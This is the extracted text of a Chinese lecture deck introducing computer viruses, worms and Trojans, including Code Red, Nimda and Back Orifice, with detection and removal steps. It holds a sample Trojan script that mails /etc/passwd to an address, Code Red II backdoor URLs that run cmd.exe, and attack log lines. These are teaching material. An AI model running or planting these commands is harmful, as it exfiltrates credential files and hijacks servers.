計算機病毒、蠕蟲和特洛伊木馬介紹(網(wǎng)絡(luò)安全基礎(chǔ)課講義).ppt
《計算機病毒、蠕蟲和特洛伊木馬介紹(網(wǎng)絡(luò)安全基礎(chǔ)課講義).ppt》由會員分享,可在線閱讀,更多相關(guān)《計算機病毒、蠕蟲和特洛伊木馬介紹(網(wǎng)絡(luò)安全基礎(chǔ)課講義).ppt(44頁珍藏版)》請在裝配圖網(wǎng)上搜索。
計算機病毒、蠕蟲和特洛伊木馬,提綱,計算機病毒網(wǎng)絡(luò)蠕蟲特洛伊木馬,計算機病毒,病毒結(jié)構(gòu)模型病毒的分類引導(dǎo)型病毒文件型病毒宏病毒病毒舉例病毒防范,計算機病毒的結(jié)構(gòu),傳染條件判斷,傳染代碼,表現(xiàn)及破壞條件判斷,破壞代碼,傳染模塊,表現(xiàn)模塊,計算機病毒的分類,按攻擊平臺分類:DOS,Win32,MAC,Unix按危害分類:良性、惡性按代碼形式:源碼、中間代碼、目標碼按宿主分類:引導(dǎo)型主引導(dǎo)區(qū)操作系統(tǒng)引導(dǎo)區(qū)文件型操作系統(tǒng)應(yīng)用程序宏病毒,引導(dǎo)型病毒引導(dǎo)記錄,主引導(dǎo)記錄(MBR),A,引導(dǎo)型病毒系統(tǒng)引導(dǎo)過程,PowerOn,CPUsetuptofindafileINT21;findthehostfileMOVAX,3D02;setuptoopenthehostfileINT21;openhostfileMOVAH,40;setuptowritefiletodiskINT21;writetofileDB*.COM;whatfilestolookfor,宏病毒(MacroVirus),歷史:1980年,Dr.FredrickCohenandRalfBurger論文1994年,MicrosoftWord第一例宏病毒W(wǎng)ord,Excel,Access,PowerPoint,Project,LotusAmiPro,Visio,Lotus1-2-3,AutoCAD,CorelDraw.使用數(shù)據(jù)文件進行傳播,使得反病毒軟件不再只關(guān)注可執(zhí)行文件和引導(dǎo)區(qū)DOEViRT統(tǒng)計,85%的病毒感染歸因于宏病毒易于編寫,只需要一兩天的時間,1015行代碼大量的用戶:90MillionMSOfficeUsers人們通常不交換程序,而交換數(shù)據(jù),宏病毒工作機理,有毒文件.doc,Normal.dot,無毒文件.doc,Normal.dot,注意事項,Macro可以存在模板里,也可以存在文檔里RTF文件也可以包含宏病毒通過IE瀏覽器可以直接打開,而不提示下載,提綱,計算機病毒網(wǎng)絡(luò)蠕蟲特洛伊木馬,蠕蟲(Worm),一個獨立的計算機程序,不需要宿主自我復(fù)制,自主傳播(Mobile)占用系統(tǒng)或網(wǎng)絡(luò)資源、破壞其他程序不偽裝成其他程序,靠自主傳播利用系統(tǒng)漏洞;利用電子郵件(無需用戶參與),莫里斯蠕蟲事件,發(fā)生于1988年,當時導(dǎo)致大約6000臺機器癱瘓主要的攻擊方法Rsh,rexec:用戶的缺省認證Sendmail的debug模式Fingerd的緩沖區(qū)溢出口令猜測,CRI,主要影響WindowsNT系統(tǒng)和Windows2000主要影響國外網(wǎng)絡(luò)據(jù)CERT統(tǒng)計,至8月初已經(jīng)感染超過25萬臺主要行為利用IIS的Index服務(wù)的緩沖區(qū)溢出缺陷進入系統(tǒng)檢查c:notworm文件是否存在以判斷是否感染中文保護(是中文windows就不修改主頁)攻擊白宮!,CRII,InspiredbyRCI影響波及全球國內(nèi)影響尤其廣泛主要行為所利用缺陷相同只感染windows2000系統(tǒng),由于一些參數(shù)的問題,只會導(dǎo)致NT死機休眠與掃描:中文windows,600個線程,Nimda簡介,影響系統(tǒng):MSwin9x,wind2k,winXP傳播途徑:Email、文件共享、頁面瀏覽、MSIIS目錄遍歷、CodeRed后門影響群發(fā)電子郵件,付病毒掃描共享文件夾,掃描有漏洞的IIS,掃描有CodeRed后門的IISServer,紅色代碼病毒,紅色代碼病毒是一種結(jié)合了病毒、木馬、DDOS機制的蠕蟲。2001年7月中旬,在美國等地大規(guī)模蔓延。2001年8月初,出現(xiàn)變種coderedII,針對中文版windows系統(tǒng),國內(nèi)大規(guī)模蔓延。通過80端口傳播。只存在與網(wǎng)絡(luò)服務(wù)器的內(nèi)存,不通過文件載體。利用IIS緩沖區(qū)溢出漏洞(2001年6月18日發(fā)布),CodeRedI,在侵入一臺服務(wù)器后,其運行步驟是:設(shè)置運行環(huán)境,修改堆棧指針,設(shè)置堆棧大小為218h字節(jié)。接著使用RVA(相對虛擬地址)查找GetProcAddress的函數(shù)地址,然后就獲得其他socket、connect、send、recv、closesocket等函數(shù)地址;如果C:notworm在,不再進一步傳染;傳染其他主機。創(chuàng)造100個線程,其中99個用戶感染其他WEB服務(wù)器,被攻擊IP通過一個算法計算得出;篡改主頁,如果系統(tǒng)默認語言為“美國英語”,第100個進程就將這臺服務(wù)的主頁改成“Welcometo!,HackedByChinese!”,并持續(xù)10個小時。(這個修改直接在內(nèi)存中修改,而不是修改*.htm文件);如果時間在20:00UTC和23:59UTC之間,將反復(fù)和白宮主頁建立連接,并發(fā)送98k字節(jié)數(shù)據(jù),形成DDOS攻擊。,CodeRedII,增加了特洛依木馬的功能,并針對中國網(wǎng)站做了改進計算IP的方法進行了修改,使病毒傳染的更快;檢查是否存在CodeRedII原子,若存在則進入睡眠狀態(tài)防止反復(fù)感染,若不存在則創(chuàng)建CodeRedII原子;創(chuàng)建300個線程進行傳染,若系統(tǒng)默認語言為簡體中文或繁體中文,則創(chuàng)建600個線程;檢查時間。病毒作者的意圖是傳播過程在2001年10月1日完成,之后,蠕蟲會爆發(fā)而使系統(tǒng)不斷重新啟動。在系統(tǒng)中安裝一個特洛依木馬:拷貝系統(tǒng)目錄cmd.exe到IIS的腳本執(zhí)行目錄下,改名為root.exe;將病毒體內(nèi)的木馬解壓縮寫到C盤和D盤的explorer.exe木馬每次系統(tǒng)和啟動都會運行,禁止系統(tǒng)的文件保護功能,并將C盤和D盤通過web服務(wù)器共享,CodeRedII,攻擊形式http:/x.x.x.x/c/inetpub/scripts/root.exe?/c+dirhttp:/x.x.x.x/c/winnt/system32/cmd.exe?/c+dir其中x.x.x.x是被攻擊的IP地址,dir可以是任意命令,比如刪除系統(tǒng)中的文件,向外發(fā)送機密數(shù)據(jù)等,這個后門后來也成為了nimda病毒的一個傳播模式。下面是cert/cc上提供的被攻擊服務(wù)器日志(CA-2001-11)2001-05-0612:20:1910.10.10.10-10.20.20.2080GET/scripts/././winnt/system32/cmd.exe/c+dir2002001-05-0612:20:1910.10.10.10-10.20.20.2080GET/scripts/././winnt/system32/cmd.exe/c+dir+.200,紅色代碼病毒的檢測和防范,針對安裝IIS的windows系統(tǒng);是否出現(xiàn)負載顯著增加(CPU/網(wǎng)絡(luò))的現(xiàn)象;用netstatan檢查是否有許多對外的80端口連接在web日志中檢查是否有/default.ida?xxx.%u0078%u0000u00=aHTTP/1.0這樣的攻擊記錄;查找系統(tǒng)中是否存在文件c:explorer.exe或d:explorer.exe以及root.exe;檢查注冊表文件中是否增加了C和D虛擬目錄,以及文件保護功能是否被禁止。在任務(wù)管理器中檢查是否存在兩個explorer.exe進程。,提綱,計算機病毒網(wǎng)絡(luò)蠕蟲特洛伊木馬,特洛伊木馬,名字來源:古希臘故事通過偽裝成其他程序、有意隱藏自己惡意行為的程序,通常留下一個遠程控制的后門沒有自我復(fù)制的功能非自主傳播用戶主動發(fā)送給其他人放到網(wǎng)站上由用戶下載,最簡單的木馬舉例,ls#!/bin/sh/bin/mailmyaddress/etc/passwdls,PATH=./:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin,特洛依木馬舉例,BackOrificeCultoftheDeadCow在1998年8月發(fā)布,公開源碼軟件,遵守GPL,是功能強大的遠程控制器木馬。boserver.exe、boconfig.exe、bogui.exe在BO服務(wù)器上啟動、停止基于文本的應(yīng)用程序目錄和文件操作。包括創(chuàng)建、刪除、查看目錄、查找、解壓、壓縮。共享。創(chuàng)建共享資源HTTP服務(wù)。啟動或停止HTTP服務(wù)。擊鍵記錄。將BO服務(wù)器上用戶的擊鍵記錄在一個文本文件中,同時記錄執(zhí)行輸入的窗口名。(可以獲得用戶口令),特洛依木馬,視頻輸入、播放。捕捉服務(wù)器屏幕到一個位圖文件中。網(wǎng)絡(luò)連接。列出和斷開BO服務(wù)器上接入和接出的連接,可以發(fā)起新連接。查看信息。查看所有網(wǎng)絡(luò)端口、域名、服務(wù)器和可見的共享“出口”。返回系統(tǒng)信息,包括機器名、當前用戶、CPU類型、內(nèi)存容量及可用內(nèi)存、Windows版本、驅(qū)動器類型、硬盤容量及使用空間。端口重定向。注冊表鎖住或重啟計算機。傳輸文件,特洛依木馬,使用netstata檢查是否還有未知端口監(jiān)聽(默認31337)檢測和刪除注冊表HLMsoftwaremicrosoftwindowscurrentVersionrunservices鍵值,是否有“NameData.exe”,若有則刪除C:windowssystem目錄:刪除“.exe”文件和windll.dll文件,特洛依木馬,其他木馬國外subsever、dagger、ACKcmdC、DeepThroat、SatansBackdoor等國內(nèi)(更常見)冰河、廣外女生、netspy、黑洞等,刪除木馬的通用方法,Win.ini文件windows節(jié)中run=和loadsystem.ini文件boot節(jié)的shell=explorer.exeAutoexec.bat文件win命令注冊表HLMsoftwaremicrosoftwindowscurrentversionrunHCUsoftwaremicrosoftwindowscurrentversionrunonceHCRexefileshellopencommand“%1”%*HCUcontrolpaneldesktopwallpaper,更高級的木馬技術(shù),服務(wù)器端程序文件的隱藏問題:磁盤上的文件、系統(tǒng)中的進程木馬:DLL陷阱防范:DLL簽名技術(shù)隱藏端口監(jiān)聽寄生:選擇一個已經(jīng)打開的端口,如80潛伏:不使用TCP/UDP,使用ICMP突破防火墻的限制反彈端口型木馬:,突破防火墻的限制:反彈端口型木馬,WebServer,病毒、蠕蟲與木馬的比較,提綱,網(wǎng)絡(luò)攻擊方法竊聽口令破解端口掃描和信息收集緩沖區(qū)溢出漏洞掃描拒絕服務(wù)惡意移動代碼計算機病毒網(wǎng)絡(luò)蠕蟲特洛伊木馬其他惡意代碼,- 1.請仔細閱讀文檔,確保文檔完整性,對于不預(yù)覽、不比對內(nèi)容而直接下載帶來的問題本站不予受理。
- 2.下載的文檔,不會出現(xiàn)我們的網(wǎng)址水印。
- 3、該文檔所得收入(下載+內(nèi)容+預(yù)覽)歸上傳者、原創(chuàng)作者;如果您是本文檔原作者,請點此認領(lǐng)!既往收益都歸您。
下載文檔到電腦,查找使用更方便
9.9 積分
下載 |
- 配套講稿:
如PPT文件的首頁顯示word圖標,表示該PPT已包含配套word講稿。雙擊word圖標可打開word文檔。
- 特殊限制:
部分文檔作品中含有的國旗、國徽等圖片,僅作為作品整體效果示例展示,禁止商用。設(shè)計者僅對作品中獨創(chuàng)性部分享有著作權(quán)。
- 關(guān) 鍵 詞:
- 計算機病毒 蠕蟲 特洛伊木馬 介紹 網(wǎng)絡(luò)安全 基礎(chǔ)課 講義
鏈接地址:http://www.szxfmmzy.com/p-3592166.html